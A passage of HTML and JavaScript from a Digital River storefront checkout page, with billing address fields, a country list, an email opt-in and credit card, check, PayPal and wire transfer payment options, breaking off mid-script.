<div class="dr_formLine">
<label class="dr_label" for="billingPostalCode">
<span class="dr_required">Zip/Postal Code:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingPostalCode">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGpostalCode" value=""/>
<input name="BILLINGpostalCode" value="" id="billingPostalCode" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCountry">
<span class="dr_required">Country:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingCountry">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcountry" value=""/>
<select name="BILLINGcountry" id="billingCountry">
<option value="" selected="selected">Select One</option>
<option value="AF">Afghanistan</option>
<option value="AL">Albania</option>
<option value="DZ">Algeria</option>
<option value="AS">American Samoa</option>
<option value="AD">Andorra</option>
<option value="AI">Anguilla</option>
<option value="AQ">Antarctica</option>
<option value="AG">Antigua and Barbuda</option>
<option value="AR">Argentina</option>
<option value="AM">Armenia</option>
<option value="AW">Aruba</option>
<option value="AU">Australia</option>
<option value="AT">Austria</option>
<option value="AZ">Azerbaidjan</option>
<option value="BS">Bahamas</option>
<option value="BH">Bahrain</option>
<option value="BD">Bangladesh</option>
<option value="BB">Barbados</option>
<option value="BY">Belarus</option>
<option value="BE">Belgium</option>
<option value="BZ">Belize</option>
<option value="BJ">Benin</option>
<option value="BM">Bermuda</option>
<option value="BT">Bhutan</option>
<option value="BO">Bolivia</option>
<option value="BA">Bosnia-Herzegovina</option>
<option value="BW">Botswana</option>
<option value="BV">Bouvet Island</option>
<option value="BR">Brazil</option>
<option value="IO">British Indian Ocean Territory</option>
<option value="BN">Brunei Darussalam</option>
<option value="BG">Bulgaria</option>
<option value="BF">Burkina Faso</option>
<option value="BI">Burundi</option>
<option value="KH">Cambodia</option>
<option value="CM">Cameroon</option>
<option value="CA">Canada</option>
<option value="CV">Cape Verde</option>
<option value="KY">Cayman Islands</option>
<option value="CF">Central African Republic</option>
<option value="TD">Chad</option>
<option value="CL">Chile</option>
<option value="CN">China</option>
<option value="CX">Christmas Island</option>
<option value="CC">Cocos (Keeling) Islands</option>
<option value="CO">Colombia</option>
<option value="KM">Comoros</option>
<option value="CG">Congo</option>
<option value="CD">Congo, The Democratic Republic Of The</option>
<option value="CK">Cook Islands</option>
<option value="CR">Costa Rica</option>
<option value="HR">Croatia</option>
<option value="CY">Cyprus</option>
<option value="CZ">Czech Republic</option>
<option value="DK">Denmark</option>
<option value="DJ">Djibouti</option>
<option value="DM">Dominica</option>
<option value="DO">Dominican Republic</option>
<option value="TL">EAST TIMOR</option>
<option value="EC">Ecuador</option>
<option value="EG">Egypt</option>
<option value="SV">El Salvador</option>
<option value="GQ">Equatorial Guinea</option>
<option value="ER">Eritrea</option>
<option value="EE">Estonia</option>
<option value="ET">Ethiopia</option>
<option value="FK">Falkland Islands</option>
<option value="FO">Faroe Islands</option>
<option value="FJ">Fiji</option>
<option value="FI">Finland</option>
<option value="FR">France</option>
<option value="GF">French Guiana</option>
<option value="TF">French Southern Territories</option>
<option value="GA">Gabon</option>
<option value="GM">Gambia</option>
<option value="GE">Georgia</option>
<option value="DE">Germany</option>
<option value="GH">Ghana</option>
<option value="GI">Gibraltar</option>
<option value="GB">Great Britain</option>
<option value="GR">Greece</option>
<option value="GL">Greenland</option>
<option value="GD">Grenada</option>
<option value="GP">Guadeloupe (French)</option>
<option value="GU">Guam (USA)</option>
<option value="GT">Guatemala</option>
<option value="GN">Guinea</option>
<option value="GW">Guinea Bissau</option>
<option value="GY">Guyana</option>
<option value="HT">Haiti</option>
<option value="HM">Heard and McDonald Islands</option>
<option value="HN">Honduras</option>
<option value="HK">Hong Kong</option>
<option value="HU">Hungary</option>
<option value="IS">Iceland</option>
<option value="IN">India</option>
<option value="ID">Indonesia</option>
<option value="IE">Ireland</option>
<option value="IL">Israel</option>
<option value="IT">Italy</option>
<option value="CI">Ivory Coast (Cote D'Ivoire)</option>
<option value="JM">Jamaica</option>
<option value="JP">Japan</option>
<option value="JO">Jordan</option>
<option value="KZ">Kazakhstan</option>
<option value="KE">Kenya</option>
<option value="KI">Kiribati</option>
<option value="KW">Kuwait</option>
<option value="KG">Kyrgyzstan</option>
<option value="LA">Laos</option>
<option value="LV">Latvia</option>
<option value="LB">Lebanon</option>
<option value="LS">Lesotho</option>
<option value="LR">Liberia</option>
<option value="LI">Liechtenstein</option>
<option value="LT">Lithuania</option>
<option value="LU">Luxembourg</option>
<option value="MO">Macau</option>
<option value="MK">Macedonia</option>
<option value="MG">Madagascar</option>
<option value="MW">Malawi</option>
<option value="MY">Malaysia</option>
<option value="MV">Maldives</option>
<option value="ML">Mali</option>
<option value="MT">Malta</option>
<option value="MH">Marshall Islands</option>
<option value="MQ">Martinique</option>
<option value="MR">Mauritania</option>
<option value="MU">Mauritius</option>
<option value="YT">Mayotte</option>
<option value="MX">Mexico</option>
<option value="FM">Micronesia, Federated States of</option>
<option value="MD">Moldavia, Republic of</option>
<option value="MC">Monaco</option>
<option value="MN">Mongolia</option>
<option value="MS">Montserrat</option>
<option value="MA">Morocco</option>
<option value="MZ">Mozambique</option>
<option value="MM">Myanmar</option>
<option value="NA">Namibia</option>
<option value="NR">Nauru</option>
<option value="NP">Nepal</option>
<option value="NL">Netherlands</option>
<option value="AN">Netherlands Antilles</option>
<option value="NC">New Caledonia (French)</option>
<option value="NZ">New Zealand</option>
<option value="NI">Nicaragua</option>
<option value="NE">Niger</option>
<option value="NG">Nigeria</option>
<option value="NU">Niue</option>
<option value="NF">Norfolk Island</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NO">Norway</option>
<option value="OM">Oman</option>
<option value="PK">Pakistan</option>
<option value="PW">Palau</option>
<option value="PA">Panama</option>
<option value="PG">Papua New Guinea</option>
<option value="PY">Paraguay</option>
<option value="PE">Peru</option>
<option value="PH">Philippines</option>
<option value="PN">Pitcairn Island</option>
<option value="PL">Poland</option>
<option value="PF">Polynesia (French)</option>
<option value="PT">Portugal</option>
<option value="PR">Puerto Rico</option>
<option value="QA">Qatar</option>
<option value="RE">Reunion (French)</option>
<option value="RO">Romania</option>
<option value="RU">Russian Federation</option>
<option value="GS">S. Georgia and S. Sandwich Isls.</option>
<option value="SH">Saint Helena</option>
<option value="KN">Saint Kitts and Nevis Anguilla</option>
<option value="LC">Saint Lucia</option>
<option value="PM">Saint Pierre and Miquelon</option>
<option value="ST">Saint Tome and Principe</option>
<option value="VC">Saint Vincent and Grenadines</option>
<option value="WS">Samoa</option>
<option value="SM">San Marino</option>
<option value="SA">Saudi Arabia</option>
<option value="SN">Senegal</option>
<option value="SC">Seychelles</option>
<option value="SL">Sierra Leone</option>
<option value="SG">Singapore</option>
<option value="SK">Slovak Republic</option>
<option value="SI">Slovenia</option>
<option value="SB">Solomon Islands</option>
<option value="ZA">South Africa</option>
<option value="KR">South Korea</option>
<option value="ES">Spain</option>
<option value="LK">Sri Lanka</option>
<option value="SR">Suriname</option>
<option value="SJ">Svalbard and Jan Mayen Islands</option>
<option value="SZ">Swaziland</option>
<option value="SE">Sweden</option>
<option value="CH">Switzerland</option>
<option value="TW">Taiwan</option>
<option value="TJ">Tajikistan</option>
<option value="TZ">Tanzania</option>
<option value="TH">Thailand</option>
<option value="TG">Togo</option>
<option value="TK">Tokelau</option>
<option value="TO">Tonga</option>
<option value="TT">Trinidad and Tobago</option>
<option value="TN">Tunisia</option>
<option value="TR">Turkey</option>
<option value="TM">Turkmenistan</option>
<option value="TC">Turks and Caicos Islands</option>
<option value="TV">Tuvalu</option>
<option value="UG">Uganda</option>
<option value="UA">Ukraine</option>
<option value="AE">United Arab Emirates</option>
<option value="US">United States</option>
<option value="UM">United States Minor Outlying Islands</option>
<option value="UY">Uruguay</option>
<option value="UZ">Uzbekistan</option>
<option value="VU">Vanuatu</option>
<option value="VA">Vatican City State</option>
<option value="VE">Venezuela</option>
<option value="VN">Vietnam</option>
<option value="VG">Virgin Islands (British)</option>
<option value="VI">Virgin Islands (USA)</option>
<option value="WF">Wallis and Futuna Islands</option>
<option value="EH">Western Sahara</option>
<option value="YE">Yemen</option>
<option value="ZM">Zambia</option>
</select>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingPhoneNumber">
<span class="dr_required">Phone Number:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingPhoneNumber">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGphoneNumber" value=""/>
<input name="BILLINGphoneNumber" value="" id="billingPhoneNumber" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="email">
<span class="dr_required">Email Address:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" requiredEmail="email">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_EMAILemail" value=""/>
<input name="EMAILemail" value="" id="email" type="text"/>
</div>
</fieldset>
</div>
<div id="dr_optInContainer">
<fieldset id="dr_optIn">
<legend>Additional Information</legend>
<h3>Additional Information</h3>
<div id="dr_optInEmail">
<div class="dr_formLine">
<label class="dr_label" for="optIn">We'd like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" name="ORIG_VALUE_optIn" value="on"/><input type="checkbox" name="optIn" value="on" checked="checked"/></div>
</div>
</fieldset>
</div>
<div id="dr_paymentContainer">
<fieldset id="dr_payment">
<legend>Payment Information</legend>
<h3>Payment Information</h3>
<span class="dr_error">
<!--..-->
</span>
<div class="dr_paymentMethodBlock" id="dr_creditCard">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1001" value="-1"/>
<input name="paymentMethodID$$1001" value="-1" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1001" value="CreditCardMethod"/>
<input name="name$$1001" value="CreditCardMethod" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1001" value=""/>
<input name="paymentMethodFee$$1001" value="" type="hidden"/>
<div class="dr_formLine" id="dr_creditCardRadioSelect">
<label class="dr_label_paymentMethodName" for="CreditCardMethod">
<input type="hidden" name="ORIG_VALUE_paymentMethodID" value="-1"/>
<input type="radio" name="paymentMethodID" value="-1" id="CreditCardMethod" checked="checked"/>
<strong class="dr_paymentOptionItem">Credit Card</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsCreditCardMethod">details</a>)</span>
<p>
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards"/>
</p>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsCreditCardMethod">
<p>Please enter your credit card as a continuous string of numbers without spaces or dashes.<br />The security of your credit card information is important to us. We use Secure Socket Layer (SSL) technology to protect the security of your credit card information.</p>
</div>
<div id="dr_creditCardSection">
<p>
<span class="dr_error">
<!--..-->
</span>
</p>
<div class="dr_formLine" id="dr_ccNumEntry">
<label class="dr_label" for="ccNum">Credit Card Number:
<span class="dr_error" validate="ccNum" checkCcNum="CreditCardMethod">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardNumber" value=""/>
<input name="cardNumber" value="" id="ccNum" type="text"/>
</div>
<div class="dr_formLine" id="dr_expDateSelect">
<label class="dr_label" for="expDate">Expiration Date:
<span class="dr_error" validate="ccMonth" expYear="ccYear" checkExpDate="CreditCardMethod">
<!--..-->
</span>
<span class="dr_error" validate="ccYear" expMonth="ccMonth" checkExpDate="CreditCardMethod">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardExpirationMonth" value=""/>
<select name="cardExpirationMonth" id="ccMonth">
<option value="" selected="selected">Select One</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select> ../<input type="hidden" name="ORIG_VALUE_cardExpirationYear" value=""/>
<select name="cardExpirationYear" id="ccYear">
<option value="" selected="selected">Select One</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
</select>
</div>
<div class="dr_formLine" id="dr_ccSecurityCodeEntry">
<label class="dr_label" for="ccCode">Card Security Code:
<span class="dr_error">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardSecurityCode" value=""/>
<input name="cardSecurityCode" value="" id="cardSecurityCode" size="4" type="text"/>Click <a href="/store/para/en_US/DisplayPage/id.CardSecurityCodeInstructionsPage" onclick="popUp(this.href,'CardSecurityCode',550,550);return false;" target="_blank">here</a> for more information.</div>
<input type="hidden" name="ORIG_VALUE_saveMyCcEnabled" value="false"/>
<input name="saveMyCcEnabled" value="false" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_saveMyCc$$1001" value="off"/>
<input name="saveMyCc$$1001" value="off" type="hidden"/>
</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_Check">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1002" value="38"/>
<input name="paymentMethodID$$1002" value="38" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1002" value="Check"/>
<input name="name$$1002" value="Check" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1002" value=""/>
<input name="paymentMethodFee$$1002" value="" type="hidden"/>
<div class="dr_formLine" id="dr_CheckRadioSelect">
<label class="dr_label_paymentMethodName" for="Check">
<input type="radio" name="paymentMethodID" id="Check" value="38"/>
<strong class="dr_paymentOptionItem">Check</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsCheck">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsCheck">Follow the instructions on the "order completed" page to pay by check. Your order will be approved 3 days after we receive your payment.</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_PayPalExpress">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1003" value="190000"/>
<input name="paymentMethodID$$1003" value="190000" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1003" value="PayPalExpress"/>
<input name="name$$1003" value="PayPalExpress" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1003" value=""/>
<input name="paymentMethodFee$$1003" value="" type="hidden"/>
<div class="dr_formLine" id="dr_PayPalExpressRadioSelect">
<label class="dr_label_paymentMethodName" for="PayPalExpress">
<input type="radio" name="paymentMethodID" id="PayPalExpress" value="190000"/>
<strong class="dr_paymentOptionItem">PayPal</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsPayPalExpress">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsPayPalExpress"><img border="0" id="dr_paypalExpressImage" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/cc_paypalExp_logo.gif"/>Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address.</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_WireTransfer">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1004" value="37"/>
<input name="paymentMethodID$$1004" value="37" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1004" value="WireTransfer"/>
<input name="name$$1004" value="WireTransfer" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1004" value=""/>
<input name="paymentMethodFee$$1004" value="" type="hidden"/>
<div class="dr_formLine" id="dr_WireTransferRadioSelect">
<label class="dr_label_paymentMethodName" for="WireTransfer">
<input type="radio" name="paymentMethodID" id="WireTransfer" value="37"/>
<strong class="dr_paymentOptionItem">Wire Transfer</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsWireTransfer">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsWireTransfer">Follow the instructions on the "order completed" page to wire the money electronically from bank to bank. This process will take approximately 4-5 days. After we receive confirmation that our bank has received your funds, your order will be sent within the next two days.</div>
</div><script language="Javascript">function PaymentEntry(name, ccNum, expMonth, expYear, billingID){this.paymentNickName = name;this.cardNumber = ccNum;this.cardExpirationMonth = expMonth;this.cardExpirationYear = expYear;this.paymentOptionID = billingID;}var paymentList = new Array();function onPaymentChange(el, prefix){var idx = el.selectedIndex - 1;if (idx > -1) {var paymentEntry = paymentList[idx];setPaymentValues(prefix, paymentEntry);} else {var selectedValue = el.options[el.selectedIndex].value;if (selectedValue == 'NEW') {document.getElementById('billingNickDiv').style.display = 'block';document.getElementById(prefix + 'Num').value = '';document.getElementById(prefix + 'NickName').value = '';document.getElementById(prefix + 'Month').value = '';document.getElementById(prefix + 'Year').value = '';} else if (selectedValue == 'FROM_REQ') {setPaymentValues(prefix, paymentAddress)}}}function setPaymentValues(prefix, PaymentEntry){document.getElementById(prefix + 'Method').value = PaymentEntry.paymentOptionID;document.getElementById(prefix + 'Num').value = PaymentEntry.cardNumber;document.getElementById(prefix + 'NickName').value = '';document.getElementById('billingNickDiv').style.display = 'none';document.getElementById(prefix + 'Month').value = PaymentEntry.cardExpirationMonth;document.getElementById(prefix + 'Year').value = PaymentEntry.cardExpirationYear;}</script></fieldset>
</div>
<input id="checkoutButton" type="image" class="dr_button" onClick="q=false" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continue_v2.gif"/><script language="Javascript">function AddressEntry(name1, name2, companyName, line1, line2, city, state, postalCode, country, phoneNumber, phoneNumber2, faxPhone){this.name1 = name1;this.name2 = name2;this.companyName = companyName;this.line1 = line1;this.line2 = line2;this.city = city;this.state = state;this.postalCode = postalCode;this.country = country;this.phoneNumber = phoneNumber;this.phoneNumber2 = phoneNumber2;this.faxPhone = faxPhone;}var shipToAddress = new AddressEntry('','','','','','','','','','','','');var addressList = new Array();function onAddressChange(el, prefix){var idx = el.selectedIndex - 2;if (idx > -1) {var addressEntry = addressList[idx];setAddressValues(prefix, addressEntry);} else {var selectedValue = el.options[el.selectedIndex].value;if (selectedValue == 'NEW') {document.getElementById(prefix + 'Name1').value = '';document.getElementById(prefix + 'Name2').value = '';document.getElementById(prefix + 'CompanyName').value = '';document.getElementById(prefix + 'Address1').value = '';document.getElementById(prefix + 'Address2').value = '';document.getElementById(prefix + 'City').value = '';document.getElementById(prefix + 'State').value = '';document.getElementById(prefix + 'PostalCode').value = '';document.getElementById(prefix + 'Country').value = '';document.getElementById(prefix + 'PhoneNumber').value = '';if (document.getElementById(prefix + 'PhoneNumber2')) {document.getElementById(prefix + 'PhoneNumber2').value = '';}if (document.getElementById(prefix + 'FaxPhone')) {document.getElementById(prefix + 'FaxPhone').value = '';}} else if (selectedValue == 'FROM_REQ') {if (prefix == 'billing') {setAddressValues(prefix, billToAddress);} else if (prefix == 'shipping') {setAddressValues(prefix, shipToAddress);}}}}function setAddressValues(prefix, addressEntry){document.getElementById(prefix + 'Name1').value = addressEntry.name1;document.getElementById(prefix + 'Name2').value = addressEntry.name2;document.getElementById(prefix + 'CompanyName').value = addressEntry.companyName;document.getElementById(prefix + 'Address1').value = addressEntry.line1;document.getElementById(prefix + 'Address2').value = addressEntry.line2;document.getElementById(prefix + 'City').value = addressEntry.city;document.getElementById(prefix + 'State').value = addressEntry.state;document.getElementById(prefix + 'PostalCode').value = addressEntry.postalCode;document.getElementById(prefix + 'Country').value = addressEntry.country;document.getElementById(prefix + 'PhoneNumber').value = addressEntry.phoneNumber;if (document.getElementById(prefix + 'PhoneNumber2')) {document.getElementById(prefix + 'PhoneNumber2').value = addressEntry.phoneNumber2;}if (document.getElementById(prefix + 'FaxPhone')) {document.getElementById(prefix + 'FaxPhone').value = addressEntry.faxPhone;}}</script>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>
</div>








<script type="text/javascript">
if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}
</script>
<script type="text/javascript">
$(function(){
   $("div.dr_ExpandPaymentDetailsSection").hide();
   $("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
   });
   $(".dr_expandDetails").click(function(){
$(this).parent().parent().parent().children("div.dr_ExpandPaymentDetailsSection").toggle();
       return false;
   });
});
</script>
<script type="text/javascript">
function CDA_changeFormValue(formElemName,value){
for(i=0; i<document.forms.length; ++i){
formObj = document.forms[i];
formElem = formObj[formElemName];
if(formElem != null){
formElem.value = value;
}
}
}
</script>
<script type="text/javascript">
var now = new Date();
var wo = new Date(now.getFullYear(),0,1,0,0,0,0).getTimezoneOffset();
var so = new Date(now.getFullYear(),6,1,0,0,0,0).getTimezoneOffset();
var co = now.getTimezoneOffset();
var dst = true;
if(wo = so){
dst = false;
}
var value = 'WO=' + wo + '&SO=' + so + '&CO=' + co + '&DST=' + dst;
CDA_changeFormValue('CLS_DATA_ANALYTICS', value)
</script>

</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutAddressPaymentInfoPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
